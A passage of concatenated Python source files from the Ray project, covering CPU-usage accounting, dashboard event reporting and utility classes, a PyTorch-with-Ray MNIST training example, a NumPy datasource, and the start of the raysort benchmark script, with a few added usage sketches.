return int(open(CPU_USAGE_PATH).read())
def _system_usage():
"""
Computes total CPU usage of the host in nanoseconds.
Logic taken from here:
https://github.com/moby/moby/blob/b42ac8d370a8ef8ec720dff0ca9dfb3530ac0a6a/daemon/stats/collector_unix.go#L31
See also the /proc/stat entry here:
https://man7.org/linux/man-pages/man5/proc.5.html
""" # noqa
cpu_summary_str = open(PROC_STAT_PATH).read().split("\n")[0]
parts = cpu_summary_str.split()
assert parts[0] == "cpu"
usage_data = parts[1:8]
total_clock_ticks = sum(int(entry) for entry in usage_data)
# 100 clock ticks per second, 10^9 ns per second
usage_ns = total_clock_ticks * 10**7
return usage_ns
def _host_num_cpus():
"""Number of physical CPUs, obtained by parsing /proc/stat."""
global host_num_cpus
if host_num_cpus is None:
proc_stat_lines = open(PROC_STAT_PATH).read().split("\n")
split_proc_stat_lines = [line.split() for line in proc_stat_lines]
cpu_lines = [
split_line for split_line in split_proc_stat_lines
if len(split_line) > 0 and "cpu" in split_line[0]
]
# Number of lines starting with a word including 'cpu', subtracting
# 1 for the first summary line.
host_num_cpus = len(cpu_lines) - 1
return host_num_cpus
```
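To make the `cpu_percent` formula concrete, a worked example with made-up deltas (no cgroup files involved):
```python
# Illustrative arithmetic only; the real values come from cgroup and /proc/stat.
cpu_delta = 2.0e9            # container CPU time used since last sample, in ns
system_delta = 4.0e9         # host CPU time per CPU since last sample, in ns
container_num_cpus = 2       # CPUs available to the container (e.g. a K8s limit)

quotient = cpu_delta / system_delta
cpu_percent = round(quotient * 100 / container_num_cpus, 1)
print(cpu_percent)           # 25.0 -> the container used a quarter of its 2-CPU quota
```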
#### File: modules/event/event_agent.py
```python
import os
import asyncio
import logging
from typing import Union
from grpc.experimental import aio as aiogrpc
import ray.new_dashboard.utils as dashboard_utils
import ray.new_dashboard.consts as dashboard_consts
from ray.ray_constants import env_bool
from ray.new_dashboard.utils import async_loop_forever, create_task
from ray.new_dashboard.modules.event import event_consts
from ray.new_dashboard.modules.event.event_utils import monitor_events
from ray.core.generated import event_pb2
from ray.core.generated import event_pb2_grpc
logger = logging.getLogger(__name__)
routes = dashboard_utils.ClassMethodRouteTable
@dashboard_utils.dashboard_module(
enable=env_bool(event_consts.EVENT_MODULE_ENVIRONMENT_KEY, False))
class EventAgent(dashboard_utils.DashboardAgentModule):
def __init__(self, dashboard_agent):
super().__init__(dashboard_agent)
self._event_dir = os.path.join(self._dashboard_agent.log_dir, "events")
os.makedirs(self._event_dir, exist_ok=True)
self._monitor: Union[asyncio.Task, None] = None
self._stub: Union[event_pb2_grpc.ReportEventServiceStub, None] = None
self._cached_events = asyncio.Queue(
event_consts.EVENT_AGENT_CACHE_SIZE)
logger.info("Event agent cache buffer size: %s",
self._cached_events.maxsize)
async def _connect_to_dashboard(self):
""" Connect to the dashboard. If the dashboard is not started, then
        this method never returns.
Returns:
The ReportEventServiceStub object.
"""
while True:
try:
aioredis = self._dashboard_agent.aioredis_client
dashboard_rpc_address = await aioredis.get(
dashboard_consts.REDIS_KEY_DASHBOARD_RPC)
if dashboard_rpc_address:
logger.info("Report events to %s", dashboard_rpc_address)
options = (("grpc.enable_http_proxy", 0), )
channel = aiogrpc.insecure_channel(
dashboard_rpc_address, options=options)
return event_pb2_grpc.ReportEventServiceStub(channel)
except Exception:
logger.exception("Connect to dashboard failed.")
await asyncio.sleep(
event_consts.RETRY_CONNECT_TO_DASHBOARD_INTERVAL_SECONDS)
@async_loop_forever(event_consts.EVENT_AGENT_REPORT_INTERVAL_SECONDS)
    async def report_events(self):
        """ Report events from the cached events queue. Reconnect to the
        dashboard if reporting fails. Log an error after retrying
        EVENT_AGENT_RETRY_TIMES times. This method never returns.
"""
data = await self._cached_events.get()
for _ in range(event_consts.EVENT_AGENT_RETRY_TIMES):
try:
logger.info("Report %s events.", len(data))
request = event_pb2.ReportEventsRequest(event_strings=data)
await self._stub.ReportEvents(request)
break
except Exception:
logger.exception("Report event failed, reconnect to the "
"dashboard.")
self._stub = await self._connect_to_dashboard()
else:
data_str = str(data)
limit = event_consts.LOG_ERROR_EVENT_STRING_LENGTH_LIMIT
logger.error("Report event failed: %s",
data_str[:limit] + (data_str[limit:] and "..."))
async def run(self, server):
# Connect to dashboard.
self._stub = await self._connect_to_dashboard()
# Start monitor task.
self._monitor = monitor_events(
self._event_dir,
lambda data: create_task(self._cached_events.put(data)),
source_types=event_consts.EVENT_AGENT_MONITOR_SOURCE_TYPES)
# Start reporting events.
await self.report_events()
```
#### File: ray/dashboard/utils.py
```python
import abc
import asyncio
import collections
import datetime
import functools
import importlib
import inspect
import json
import logging
import os
import pkgutil
import socket
import traceback
from abc import ABCMeta, abstractmethod
from base64 import b64decode
from collections import namedtuple
from collections.abc import MutableMapping, Mapping, Sequence
from typing import Any
import aiohttp.signals
import aiohttp.web
import aioredis
import time
from aiohttp import hdrs
from aiohttp.frozenlist import FrozenList
from aiohttp.typedefs import PathLike
from aiohttp.web import RouteDef
from google.protobuf.json_format import MessageToDict
import ray.new_dashboard.consts as dashboard_consts
from ray.ray_constants import env_bool
from ray._private.utils import binary_to_hex
try:
create_task = asyncio.create_task
except AttributeError:
create_task = asyncio.ensure_future
logger = logging.getLogger(__name__)
class DashboardAgentModule(abc.ABC):
def __init__(self, dashboard_agent):
"""
Initialize current module when DashboardAgent loading modules.
:param dashboard_agent: The DashboardAgent instance.
"""
self._dashboard_agent = dashboard_agent
@abc.abstractmethod
async def run(self, server):
"""
Run the module in an asyncio loop. An agent module can provide
servicers to the server.
:param server: Asyncio GRPC server.
"""
class DashboardHeadModule(abc.ABC):
def __init__(self, dashboard_head):
"""
Initialize current module when DashboardHead loading modules.
:param dashboard_head: The DashboardHead instance.
"""
self._dashboard_head = dashboard_head
@abc.abstractmethod
async def run(self, server):
"""
Run the module in an asyncio loop. A head module can provide
servicers to the server.
:param server: Asyncio GRPC server.
"""
class ClassMethodRouteTable:
"""A helper class to bind http route to class method."""
_bind_map = collections.defaultdict(dict)
_routes = aiohttp.web.RouteTableDef()
class _BindInfo:
def __init__(self, filename, lineno, instance):
self.filename = filename
self.lineno = lineno
self.instance = instance
@classmethod
def routes(cls):
return cls._routes
@classmethod
def bound_routes(cls):
bound_items = []
for r in cls._routes._items:
if isinstance(r, RouteDef):
route_method = getattr(r.handler, "__route_method__")
route_path = getattr(r.handler, "__route_path__")
instance = cls._bind_map[route_method][route_path].instance
if instance is not None:
bound_items.append(r)
else:
bound_items.append(r)
routes = aiohttp.web.RouteTableDef()
routes._items = bound_items
return routes
@classmethod
def _register_route(cls, method, path, **kwargs):
def _wrapper(handler):
if path in cls._bind_map[method]:
bind_info = cls._bind_map[method][path]
raise Exception(f"Duplicated route path: {path}, "
f"previous one registered at "
f"{bind_info.filename}:{bind_info.lineno}")
bind_info = cls._BindInfo(handler.__code__.co_filename,
handler.__code__.co_firstlineno, None)
@functools.wraps(handler)
async def _handler_route(*args) -> aiohttp.web.Response:
try:
# Make the route handler as a bound method.
# The args may be:
# * (Request, )
# * (self, Request)
req = args[-1]
return await handler(bind_info.instance, req)
except Exception:
logger.exception("Handle %s %s failed.", method, path)
return rest_response(
success=False, message=traceback.format_exc())
cls._bind_map[method][path] = bind_info
_handler_route.__route_method__ = method
_handler_route.__route_path__ = path
return cls._routes.route(method, path, **kwargs)(_handler_route)
return _wrapper
@classmethod
def head(cls, path, **kwargs):
return cls._register_route(hdrs.METH_HEAD, path, **kwargs)
@classmethod
def get(cls, path, **kwargs):
return cls._register_route(hdrs.METH_GET, path, **kwargs)
@classmethod
def post(cls, path, **kwargs):
return cls._register_route(hdrs.METH_POST, path, **kwargs)
@classmethod
def put(cls, path, **kwargs):
return cls._register_route(hdrs.METH_PUT, path, **kwargs)
@classmethod
def patch(cls, path, **kwargs):
return cls._register_route(hdrs.METH_PATCH, path, **kwargs)
@classmethod
def delete(cls, path, **kwargs):
return cls._register_route(hdrs.METH_DELETE, path, **kwargs)
@classmethod
def view(cls, path, **kwargs):
return cls._register_route(hdrs.METH_ANY, path, **kwargs)
@classmethod
def static(cls, prefix: str, path: PathLike, **kwargs: Any) -> None:
cls._routes.static(prefix, path, **kwargs)
@classmethod
def bind(cls, instance):
def predicate(o):
if inspect.ismethod(o):
return hasattr(o, "__route_method__") and hasattr(
o, "__route_path__")
return False
handler_routes = inspect.getmembers(instance, predicate)
for _, h in handler_routes:
cls._bind_map[h.__func__.__route_method__][
h.__func__.__route_path__].instance = instance
def dashboard_module(enable):
"""A decorator for dashboard module."""
def _cls_wrapper(cls):
cls.__ray_dashboard_module_enable__ = enable
return cls
return _cls_wrapper
def get_all_modules(module_type):
logger.info(f"Get all modules by type: {module_type.__name__}")
import ray.new_dashboard.modules
for module_loader, name, ispkg in pkgutil.walk_packages(
ray.new_dashboard.modules.__path__,
ray.new_dashboard.modules.__name__ + "."):
importlib.import_module(name)
return [
m for m in module_type.__subclasses__()
if getattr(m, "__ray_dashboard_module_enable__", True)
]
def to_posix_time(dt):
return (dt - datetime.datetime(1970, 1, 1)).total_seconds()
def address_tuple(address):
if isinstance(address, tuple):
return address
ip, port = address.split(":")
return ip, int(port)
class CustomEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, bytes):
return binary_to_hex(obj)
if isinstance(obj, Immutable):
return obj.mutable()
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, obj)
def rest_response(success, message, **kwargs) -> aiohttp.web.Response:
# In the dev context we allow a dev server running on a
# different port to consume the API, meaning we need to allow
# cross-origin access
if os.environ.get("RAY_DASHBOARD_DEV") == "1":
headers = {"Access-Control-Allow-Origin": "*"}
else:
headers = {}
return aiohttp.web.json_response(
{
"result": success,
"msg": message,
"data": to_google_style(kwargs)
},
dumps=functools.partial(json.dumps, cls=CustomEncoder),
headers=headers)
def to_camel_case(snake_str):
"""Convert a snake str to camel case."""
components = snake_str.split("_")
# We capitalize the first letter of each component except the first one
# with the 'title' method and join them together.
return components[0] + "".join(x.title() for x in components[1:])
def to_google_style(d):
"""Recursive convert all keys in dict to google style."""
new_dict = {}
for k, v in d.items():
if isinstance(v, dict):
new_dict[to_camel_case(k)] = to_google_style(v)
elif isinstance(v, list):
new_list = []
for i in v:
if isinstance(i, dict):
new_list.append(to_google_style(i))
else:
new_list.append(i)
new_dict[to_camel_case(k)] = new_list
else:
new_dict[to_camel_case(k)] = v
return new_dict
def message_to_dict(message, decode_keys=None, **kwargs):
"""Convert protobuf message to Python dict."""
def _decode_keys(d):
for k, v in d.items():
if isinstance(v, dict):
d[k] = _decode_keys(v)
if isinstance(v, list):
new_list = []
for i in v:
if isinstance(i, dict):
new_list.append(_decode_keys(i))
else:
new_list.append(i)
d[k] = new_list
else:
if k in decode_keys:
d[k] = binary_to_hex(b64decode(v))
else:
d[k] = v
return d
if decode_keys:
return _decode_keys(
MessageToDict(message, use_integers_for_enums=False, **kwargs))
else:
return MessageToDict(message, use_integers_for_enums=False, **kwargs)
# The cache value type used by aiohttp_cache.
_AiohttpCacheValue = namedtuple("AiohttpCacheValue",
["data", "expiration", "task"])
# The methods with no request body used by aiohttp_cache.
_AIOHTTP_CACHE_NOBODY_METHODS = {hdrs.METH_GET, hdrs.METH_DELETE}
def aiohttp_cache(
ttl_seconds=dashboard_consts.AIOHTTP_CACHE_TTL_SECONDS,
maxsize=dashboard_consts.AIOHTTP_CACHE_MAX_SIZE,
enable=not env_bool(
dashboard_consts.AIOHTTP_CACHE_DISABLE_ENVIRONMENT_KEY, False)):
assert maxsize > 0
cache = collections.OrderedDict()
def _wrapper(handler):
if enable:
@functools.wraps(handler)
async def _cache_handler(*args) -> aiohttp.web.Response:
# Make the route handler as a bound method.
# The args may be:
# * (Request, )
# * (self, Request)
req = args[-1]
# Make key.
if req.method in _AIOHTTP_CACHE_NOBODY_METHODS:
key = req.path_qs
else:
key = (req.path_qs, await req.read())
# Query cache.
value = cache.get(key)
if value is not None:
cache.move_to_end(key)
if (not value.task.done()
or value.expiration >= time.time()):
# Update task not done or the data is not expired.
return aiohttp.web.Response(**value.data)
def _update_cache(task):
try:
response = task.result()
except Exception:
response = rest_response(
success=False, message=traceback.format_exc())
data = {
"status": response.status,
"headers": dict(response.headers),
"body": response.body,
}
cache[key] = _AiohttpCacheValue(data,
time.time() + ttl_seconds,
task)
cache.move_to_end(key)
if len(cache) > maxsize:
cache.popitem(last=False)
return response
task = create_task(handler(*args))
task.add_done_callback(_update_cache)
if value is None:
return await task
else:
return aiohttp.web.Response(**value.data)
suffix = f"[cache ttl={ttl_seconds}, max_size={maxsize}]"
_cache_handler.__name__ += suffix
_cache_handler.__qualname__ += suffix
return _cache_handler
else:
return handler
if inspect.iscoroutinefunction(ttl_seconds):
target_func = ttl_seconds
ttl_seconds = dashboard_consts.AIOHTTP_CACHE_TTL_SECONDS
return _wrapper(target_func)
else:
return _wrapper
class SignalManager:
_signals = FrozenList()
@classmethod
def register(cls, sig):
cls._signals.append(sig)
@classmethod
def freeze(cls):
cls._signals.freeze()
for sig in cls._signals:
sig.freeze()
class Signal(aiohttp.signals.Signal):
__slots__ = ()
def __init__(self, owner):
super().__init__(owner)
SignalManager.register(self)
class Bunch(dict):
"""A dict with attribute-access."""
def __getattr__(self, key):
try:
return self.__getitem__(key)
except KeyError:
raise AttributeError(key)
def __setattr__(self, key, value):
self.__setitem__(key, value)
class Change:
"""Notify change object."""
def __init__(self, owner=None, old=None, new=None):
self.owner = owner
self.old = old
self.new = new
def __str__(self):
return f"Change(owner: {type(self.owner)}), " \
f"old: {self.old}, new: {self.new}"
class NotifyQueue:
"""Asyncio notify queue for Dict signal."""
_queue = asyncio.Queue()
@classmethod
def put(cls, co):
cls._queue.put_nowait(co)
@classmethod
async def get(cls):
return await cls._queue.get()
"""
https://docs.python.org/3/library/json.html?highlight=json#json.JSONEncoder
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str | string |
+-------------------+---------------+
| int, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
"""
_json_compatible_types = {
dict, list, tuple, str, int, float, bool,
type(None), bytes
}
def is_immutable(self):
raise TypeError("%r objects are immutable" % self.__class__.__name__)
def make_immutable(value, strict=True):
value_type = type(value)
if value_type is dict:
return ImmutableDict(value)
if value_type is list:
return ImmutableList(value)
if strict:
if value_type not in _json_compatible_types:
raise TypeError("Type {} can't be immutable.".format(value_type))
return value
class Immutable(metaclass=ABCMeta):
@abstractmethod
def mutable(self):
pass
class ImmutableList(Immutable, Sequence):
"""Makes a :class:`list` immutable.
"""
__slots__ = ("_list", "_proxy")
def __init__(self, list_value):
if type(list_value) not in (list, ImmutableList):
raise TypeError(f"{type(list_value)} object is not a list.")
if isinstance(list_value, ImmutableList):
list_value = list_value.mutable()
self._list = list_value
self._proxy = [None] * len(list_value)
def __reduce_ex__(self, protocol):
return type(self), (self._list, )
def mutable(self):
return self._list
def __eq__(self, other):
if isinstance(other, ImmutableList):
other = other.mutable()
return list.__eq__(self._list, other)
def __ne__(self, other):
if isinstance(other, ImmutableList):
other = other.mutable()
return list.__ne__(self._list, other)
def __contains__(self, item):
if isinstance(item, Immutable):
item = item.mutable()
return list.__contains__(self._list, item)
def __getitem__(self, item):
proxy = self._proxy[item]
if proxy is None:
proxy = self._proxy[item] = make_immutable(self._list[item])
return proxy
def __len__(self):
return len(self._list)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, list.__repr__(self._list))
class ImmutableDict(Immutable, Mapping):
"""Makes a :class:`dict` immutable.
"""
__slots__ = ("_dict", "_proxy")
def __init__(self, dict_value):
if type(dict_value) not in (dict, ImmutableDict):
raise TypeError(f"{type(dict_value)} object is not a dict.")
if isinstance(dict_value, ImmutableDict):
dict_value = dict_value.mutable()
self._dict = dict_value
self._proxy = {}
def __reduce_ex__(self, protocol):
return type(self), (self._dict, )
def mutable(self):
return self._dict
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return make_immutable(default)
def __eq__(self, other):
if isinstance(other, ImmutableDict):
other = other.mutable()
return dict.__eq__(self._dict, other)
def __ne__(self, other):
if isinstance(other, ImmutableDict):
other = other.mutable()
return dict.__ne__(self._dict, other)
def __contains__(self, item):
if isinstance(item, Immutable):
item = item.mutable()
return dict.__contains__(self._dict, item)
def __getitem__(self, item):
proxy = self._proxy.get(item, None)
if proxy is None:
proxy = self._proxy[item] = make_immutable(self._dict[item])
return proxy
def __len__(self) -> int:
return len(self._dict)
def __iter__(self):
if len(self._proxy) != len(self._dict):
for key in self._dict.keys() - self._proxy.keys():
self._proxy[key] = make_immutable(self._dict[key])
return iter(self._proxy)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, dict.__repr__(self._dict))
class Dict(ImmutableDict, MutableMapping):
"""A simple descriptor for dict type to notify data changes.
:note: Only the first level data report change.
"""
ChangeItem = namedtuple("DictChangeItem", ["key", "value"])
def __init__(self, *args, **kwargs):
super().__init__(dict(*args, **kwargs))
self.signal = Signal(self)
def __setitem__(self, key, value):
old = self._dict.pop(key, None)
self._proxy.pop(key, None)
self._dict[key] = value
if len(self.signal) and old != value:
if old is None:
co = self.signal.send(
Change(owner=self, new=Dict.ChangeItem(key, value)))
else:
co = self.signal.send(
Change(
owner=self,
old=Dict.ChangeItem(key, old),
new=Dict.ChangeItem(key, value)))
NotifyQueue.put(co)
def __delitem__(self, key):
old = self._dict.pop(key, None)
self._proxy.pop(key, None)
if len(self.signal) and old is not None:
co = self.signal.send(
Change(owner=self, old=Dict.ChangeItem(key, old)))
NotifyQueue.put(co)
def reset(self, d):
assert isinstance(d, Mapping)
for key in self._dict.keys() - d.keys():
del self[key]
for key, value in d.items():
self[key] = value
# Register immutable types.
for immutable_type in Immutable.__subclasses__():
_json_compatible_types.add(immutable_type)
async def get_aioredis_client(redis_address, redis_password,
retry_interval_seconds, retry_times):
for x in range(retry_times):
try:
return await aioredis.create_redis_pool(
address=redis_address, password=redis_password)
except (socket.gaierror, ConnectionError) as ex:
            logger.error("Connecting to Redis failed: %s, retrying...", ex)
await asyncio.sleep(retry_interval_seconds)
# Raise exception from create_redis_pool
return await aioredis.create_redis_pool(
address=redis_address, password=redis_password)
def async_loop_forever(interval_seconds, cancellable=False):
def _wrapper(coro):
@functools.wraps(coro)
async def _looper(*args, **kwargs):
while True:
try:
await coro(*args, **kwargs)
except asyncio.CancelledError as ex:
if cancellable:
                        logger.info(f"An async loop forever coroutine "
                                    f"was cancelled: {coro}.")
                        raise ex
                    else:
                        logger.exception(f"Cannot cancel the async loop "
                                         f"forever coroutine {coro}.")
except Exception:
logger.exception(f"Error looping coroutine {coro}.")
await asyncio.sleep(interval_seconds)
return _looper
return _wrapper
```
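A minimal usage sketch of the `async_loop_forever` decorator defined above, written as if appended to the same module (so the decorator and the module-level `logger` are already in scope); the coroutine names here are illustrative only.
```python
import asyncio

@async_loop_forever(interval_seconds=1.0, cancellable=True)
async def heartbeat():
    # Runs once per interval; non-cancellation errors are logged by the
    # decorator and the loop keeps going.
    print("tick")

async def _demo():
    task = asyncio.get_event_loop().create_task(heartbeat())
    await asyncio.sleep(3.5)  # let a few iterations run
    task.cancel()             # with cancellable=True the loop exits cleanly

if __name__ == "__main__":
    asyncio.run(_demo())
```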
#### File: examples/doc_code/torch_example.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.conv1 = nn.Conv2d(1, 20, 5, 1)
self.conv2 = nn.Conv2d(20, 50, 5, 1)
self.fc1 = nn.Linear(4 * 4 * 50, 500)
self.fc2 = nn.Linear(500, 10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.max_pool2d(x, 2, 2)
x = F.relu(self.conv2(x))
x = F.max_pool2d(x, 2, 2)
x = x.view(-1, 4 * 4 * 50)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return F.log_softmax(x, dim=1)
# __torch_model_end__
# yapf: enable
# yapf: disable
# __torch_helper_start__
from filelock import FileLock
from torchvision import datasets, transforms
def train(model, device, train_loader, optimizer):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
        # This early return is just to speed up the tutorial.
if batch_idx * len(data) > 1024:
return
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
def test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
# sum up batch loss
test_loss += F.nll_loss(
output, target, reduction="sum").item()
pred = output.argmax(
dim=1,
keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
return {
"loss": test_loss,
"accuracy": 100. * correct / len(test_loader.dataset)
}
def dataset_creator(use_cuda):
kwargs = {"num_workers": 1, "pin_memory": True} if use_cuda else {}
with FileLock("./data.lock"):
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(
"~/data",
train=True,
download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307, ), (0.3081, ))
])),
batch_size=128,
shuffle=True,
**kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST(
"~/data",
train=False,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307, ), (0.3081, ))
])),
batch_size=128,
shuffle=True,
**kwargs)
return train_loader, test_loader
# __torch_helper_end__
# yapf: enable
# yapf: disable
# __torch_net_start__
import torch.optim as optim
class Network(object):
def __init__(self, lr=0.01, momentum=0.5):
use_cuda = torch.cuda.is_available()
self.device = device = torch.device("cuda" if use_cuda else "cpu")
self.train_loader, self.test_loader = dataset_creator(use_cuda)
self.model = Model().to(device)
self.optimizer = optim.SGD(
self.model.parameters(), lr=lr, momentum=momentum)
def train(self):
train(self.model, self.device, self.train_loader, self.optimizer)
return test(self.model, self.device, self.test_loader)
def get_weights(self):
return self.model.state_dict()
def set_weights(self, weights):
self.model.load_state_dict(weights)
def save(self):
torch.save(self.model.state_dict(), "mnist_cnn.pt")
net = Network()
net.train()
# __torch_net_end__
# yapf: enable
# yapf: disable
# __torch_ray_start__
import ray
ray.init()
RemoteNetwork = ray.remote(Network)
# Use the below instead of `ray.remote(Network)` to leverage the GPU.
# RemoteNetwork = ray.remote(num_gpus=1)(Network)
# __torch_ray_end__
# yapf: enable
# yapf: disable
# __torch_actor_start__
NetworkActor = RemoteNetwork.remote()
NetworkActor2 = RemoteNetwork.remote()
ray.get([NetworkActor.train.remote(), NetworkActor2.train.remote()])
# __torch_actor_end__
# yapf: enable
# yapf: disable
# __weight_average_start__
weights = ray.get(
[NetworkActor.get_weights.remote(),
NetworkActor2.get_weights.remote()])
from collections import OrderedDict
averaged_weights = OrderedDict(
[(k, (weights[0][k] + weights[1][k]) / 2) for k in weights[0]])
weight_id = ray.put(averaged_weights)
[
actor.set_weights.remote(weight_id)
for actor in [NetworkActor, NetworkActor2]
]
ray.get([actor.train.remote() for actor in [NetworkActor, NetworkActor2]])
```
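The final snippets above fetch each actor's weights once, average them, and broadcast the result before one more round of training. A possible extension (not part of the original example) is to repeat that cycle; a minimal sketch, written as if appended to the script above:
```python
# Hypothetical extension: repeat the train -> average -> broadcast cycle.
for _ in range(3):
    weights = ray.get([
        NetworkActor.get_weights.remote(),
        NetworkActor2.get_weights.remote()
    ])
    averaged_weights = OrderedDict(
        [(k, (weights[0][k] + weights[1][k]) / 2) for k in weights[0]])
    weight_id = ray.put(averaged_weights)
    ray.get([
        actor.set_weights.remote(weight_id)
        for actor in [NetworkActor, NetworkActor2]
    ])
    ray.get([actor.train.remote() for actor in [NetworkActor, NetworkActor2]])
```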
#### File: data/datasource/numpy_datasource.py
```python
from io import BytesIO
from typing import TYPE_CHECKING
import numpy as np
if TYPE_CHECKING:
import pyarrow
from ray.data.datasource.file_based_datasource import (FileBasedDatasource)
class NumpyDatasource(FileBasedDatasource):
"""Numpy datasource, for reading and writing Numpy files.
Examples:
>>> source = NumpyDatasource()
>>> ray.data.read_datasource(source, paths="/path/to/dir").take()
... [array([0., 1., 2.]), ...]
"""
def _read_file(self, f: "pyarrow.NativeFile", path: str, **reader_args):
# TODO(ekl) Ideally numpy can read directly from the file, but it
# seems like it requires the file to be seekable.
buf = BytesIO()
data = f.readall()
buf.write(data)
buf.seek(0)
return np.load(buf)
```
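A minimal end-to-end sketch mirroring the class docstring above; the import path is inferred from the file header and the temporary directory and file name are illustrative. It assumes Ray Datasets is installed and a local Ray instance can be started.
```python
import os

import numpy as np
import ray

# Hypothetical import path, inferred from the file header above.
from ray.data.datasource.numpy_datasource import NumpyDatasource

ray.init()
os.makedirs("/tmp/numpy_data", exist_ok=True)
np.save("/tmp/numpy_data/part-0.npy", np.arange(3, dtype=float))

# Mirrors the usage shown in the docstring: read every .npy file in the dir.
ds = ray.data.read_datasource(NumpyDatasource(), paths="/tmp/numpy_data")
print(ds.take())  # e.g. [array([0., 1., 2.])]
```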
#### File: data/examples/demo_infer.py
```python
import ray
import time
ray.init(num_gpus=2)
ds = ray.data.range(100)
def preprocess(x):
import time
time.sleep(.1)
return x
class Model:
def __call__(self, x):
time.sleep(.1)
return x
ds = ds.pipeline(parallelism=10) \
.map(preprocess) \
.map(Model, compute="actors", num_gpus=1)
for x in ds.iter_rows():
pass
```
#### File: experimental/raysort/main.py
```python
import argparse
import csv
import logging
import os
import random
import subprocess
from typing import Iterable, List
import numpy as np
import ray
from ray.experimental.raysort import constants
from ray.experimental.raysort import logging_utils
from ray.experimental.raysort import sortlib
from ray.experimental.raysort import tracing_utils
from ray.experimental.raysort.types import BlockInfo, ByteCount, RecordCount, PartId, PartitionInfo, Path # noqa: E501
# ------------------------------------------------------------
# Parse Arguments
# ------------------------------------------------------------
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--ray_address",
default="auto",
type=str,
help="if set to None, will launch a local Ray cluster",
)
parser.add_argument(
"--total_data_size",
default=1_000_000_000,
type=ByteCount,
        help="total data size in bytes",
)
parser.add_argument(
"--num_mappers",
default=4,
type=int,
help="number of map tasks",
)
parser.add_argument(
"--num_reducers",
default=4,
type=int,
help="number of reduce tasks",
)
parser.add_argument(
"--reducer_batch_num_records",
default=1_000_000,
type=RecordCount,
        help="number of records to buffer before writing the output to EBS",
)
parser.add_argument(
"--skip_sorting",
default=False,
action="store_true",
help="if set, no sorting is actually performed",
)
parser.add_argument(
"--skip_input",
default=False,
action="store_true",
help="if set, mappers will not read data from disk",
)
parser.add_argument(
"--skip_output",
default=False,
action="store_true",
help="if set, reducers will not write out results to disk",
)
# Which tasks to run?
tasks_group = parser.add_argument_group(
"tasks to run", "if no task is specified, will run all tasks")
tasks = ["generate_input", "sort", "validate_output"]
for task in tasks:
tasks_group.add_argument(
f"--{task}", action="store_true", help=f"run task {task}")
args = parser.parse_args()
# Derive additional arguments.
args.input_part_size = ByteCount(args.total_data_size / args.num_mappers)
args.output_part_size = ByteCount(args.total_data_size / args.num_reducers)
args.mount_points = _get_mount_points()
# If no tasks are specified, run all tasks.
args_dict = vars(args)
if not any(args_dict[task] for task in tasks):
for task in tasks:
args_dict[task] = True
return args
def _get_mount_points():
mnt = "/mnt"
if not os.path.exists(mnt):
return []
return [os.path.join(mnt, d) for d in os.listdir(mnt)]
args = None
# ------------------------------------------------------------
# Generate Input
# ------------------------------------------------------------
def _make_partition_info(part_id: PartId, kind="input") -> PartitionInfo:
node = ray.worker.global_worker.node_ip_address
mnt = random.choice(args.mount_points)
filepath = _get_part_path(mnt, part_id, kind)
return PartitionInfo(part_id, node, filepath)
def _get_part_path(mnt: Path, part_id: PartId, kind="input") -> Path:
assert kind in {"input", "output"}
dir_fmt = constants.DATA_DIR_FMT[kind]
dirpath = dir_fmt.format(mnt=mnt)
os.makedirs(dirpath, exist_ok=True)
filename_fmt = constants.FILENAME_FMT[kind]
filename = filename_fmt.format(part_id=part_id)
filepath = os.path.join(dirpath, filename)
return filepath
@ray.remote
def generate_part(part_id: PartId, size: RecordCount,
offset: RecordCount) -> PartitionInfo:
logging_utils.init()
pinfo = _make_partition_info(part_id)
if not args.skip_input:
subprocess.run(
[constants.GENSORT_PATH, f"-b{offset}", f"{size}", pinfo.path],
check=True)
logging.info(f"Generated input {pinfo}")
return pinfo
def generate_input():
if args.skip_input:
return
size = constants.bytes_to_records(args.input_part_size)
offset = 0
tasks = []
for part_id in range(args.num_mappers):
tasks.append(generate_part.remote(part_id, size, offset))
offset += size
assert offset == constants.bytes_to_records(args.total_data_size), args
logging.info(f"Generating {len(tasks)} partitions")
parts = ray.get(tasks)
with open(constants.INPUT_MANIFEST_FILE, "w") as fout:
writer = csv.writer(fout)
writer.writerows(parts)
# ------------------------------------------------------------
# Sort
# ------------------------------------------------------------
def _load_manifest(path: Path) -> List[PartitionInfo]:
if args.skip_input:
return _load_dummy_manifest()
with open(path) as fin:
reader = csv.reader(fin)
return [
PartitionInfo(int(part_id), node, path)
for part_id, node, path in reader
]
def _load_dummy_manifest() -> List[PartitionInfo]:
return [PartitionInfo(i, "", "") for i in range(args.num_mappers)]
def _load_partition(path: Path) -> np.ndarray:
return np.fromfile(path, dtype=np.uint8)
def _dummy_sort_and_partition(part: np.ndarray,
boundaries: List[int]) -> List[BlockInfo]:
N = len(boundaries)
offset = 0
size = int(np.ceil(part.size / N))
blocks = []
for _ in range(N):
blocks.append((offset, size))
offset += size
return blocks
@ray.remote
def mapper(boundaries: List[int], mapper_id: PartId,
path: Path) -> List[ray.ObjectRef]:
logging_utils.init()
task_id = f"M-{mapper_id} Mapper"
logging.info(f"{task_id} starting {args}")
if args.skip_input:
block_size = int(np.ceil(args.input_part_size / args.num_reducers))
return [
ray.put(
